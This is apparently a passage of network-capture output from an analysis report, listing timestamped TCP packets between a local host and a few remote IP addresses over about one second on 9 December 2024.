                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.976346016 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.976402044 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.976560116 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.976618052 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.977350950 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.977530956 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.977535009 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.977562904 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.978275061 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.978319883 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.978387117 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.978425980 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.979336023 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.979389906 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.979759932 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.979803085 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.980438948 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.980477095 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.980552912 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.980606079 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.981484890 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.981529951 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.981774092 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.982749939 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.982796907 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.983191013 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.983232021 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.983745098 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.983843088 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.983889103 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.984743118 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.984786987 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.984980106 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.985028028 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.985965014 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.986015081 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.986180067 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.986227989 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.986927032 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.986979008 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.987225056 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.987270117 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.988033056 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.988075018 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.988224030 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.988261938 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.989058971 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.989105940 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.989181042 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.989274025 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.990149021 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.990196943 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.990432978 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.990483999 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.991240978 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.991283894 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.991487980 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.991528034 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.992448092 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.992763996 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.992805958 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.993408918 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.993465900 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.994103909 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.994554996 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.994564056 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.994594097 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.994621038 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.995583057 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.996143103 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.996205091 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.996731997 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.997189045 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.997294903 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.997798920 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.997833967 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.997992992 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.998986006 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.999036074 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.999304056 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.999346972 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:52.999917030 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.000089884 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.000139952 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.000994921 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.001420021 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.001467943 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.002043009 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.002974033 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.003032923 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.003073931 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.003232002 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.003386021 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.003442049 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.003479958 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.004277945 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.004318953 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.004453897 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.004491091 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.005295038 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.005448103 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.005486965 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.006376982 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.007095098 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.007150888 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.007499933 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.007560968 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.007822037 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.008585930 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.008635044 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.008717060 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.008956909 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.009659052 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.009747982 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.009798050 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.010716915 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.011018991 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.011076927 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.011796951 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.012038946 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.012098074 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.012900114 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.012950897 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.013510942 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.013998985 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.014049053 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.014736891 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.015110016 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.015121937 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.015167952 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.016251087 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.016295910 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.016531944 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.017503023 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.017534018 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.017584085 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.017668009 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.018404007 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.018445969 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.018565893 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.019520998 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.019577026 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.019746065 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.019792080 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.020459890 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.020906925 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.020957947 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.021666050 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.021856070 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.021904945 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.022625923 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.022670984 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.022891998 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.023706913 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.023761988 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.023917913 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.024872065 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.024924040 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.025048018 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.025861025 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.025909901 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.025991917 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.026982069 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.027036905 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.027450085 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.027489901 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.163454056 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.163670063 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.163738012 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.163899899 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.164175987 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.164218903 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.164447069 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.164489985 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.165280104 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.165350914 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.165512085 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.165550947 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.166301012 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.166384935 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.166548014 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.166590929 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.167587042 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.167628050 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.167800903 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.167840958 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.168525934 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.168567896 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.168872118 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.168920994 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.169589996 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.169656992 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.169732094 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.169791937 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.170612097 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.170651913 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.170790911 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.170825005 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.171763897 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.171808958 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.172102928 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.172144890 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.172774076 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.172817945 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.172877073 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.172985077 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.173901081 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.173938036 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.174216986 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.174263954 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.174928904 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.174982071 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.175148010 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.175208092 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.175441980 CET44349973104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.175539970 CET44349973104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.175591946 CET49973443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.176043034 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.176091909 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.176120996 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.176153898 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.177171946 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.177249908 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.177691936 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.177787066 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.178174973 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.178215027 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.178740025 CET49979443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.178759098 CET44349979104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.178977013 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.179028988 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.179294109 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.179461002 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.179466963 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.179502010 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.180402994 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.180522919 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.180583954 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.181413889 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.181814909 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.181855917 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.181909084 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.182502985 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.182543039 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.182666063 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.182703972 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.183660030 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.183705091 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.183809042 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.183849096 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.184731960 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.184778929 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.184832096 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.184870005 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.185870886 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.185965061 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.186178923 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.186222076 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.186871052 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.187118053 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.187156916 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.187350035 CET49973443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.187380075 CET44349973104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.187952995 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.187964916 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.187999964 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.188770056 CET4995780192.168.2.680.82.65.70
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.189034939 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.189321041 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.189376116 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.190068007 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:53.190109968 CET4996980192.168.2.6185.215.113.16
